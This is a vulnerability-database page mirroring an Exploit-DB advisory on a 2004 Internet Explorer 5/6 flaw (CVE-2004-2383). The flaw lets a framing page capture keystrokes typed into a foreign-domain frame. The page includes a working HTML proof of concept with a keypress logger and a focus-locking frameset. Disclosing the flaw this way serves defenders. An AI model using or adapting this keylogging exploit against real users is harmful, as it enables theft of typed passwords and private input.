Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbIDefenseEDB-ID:23766
HistoryFeb 27, 2004 - 12:00 a.m.

Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage

2004-02-2700:00:00
iDefense
www.exploit-db.com
11

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/9761/info

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain. 

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.example.com" scrolling="auto">
</frameset>
</html>

Related

checkpoint_advisories 1
cvelist 1
cve 1
nvd 1
checkpoint_advisories
checkpoint_advisories
Internet Explorer Cross Frame Scripting Restriction Bypass (CVE-2004-2383)
2010-02-09 00:00:00
cvelist
cvelist
CVE-2004-2383
2005-08-16 04:00:00
cve
cve
CVE-2004-2383
2005-08-16 04:00:00
nvd
nvd
CVE-2004-2383
2004-12-31 05:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:23766
checkpoint_advisories1cvelist1cve1nvd1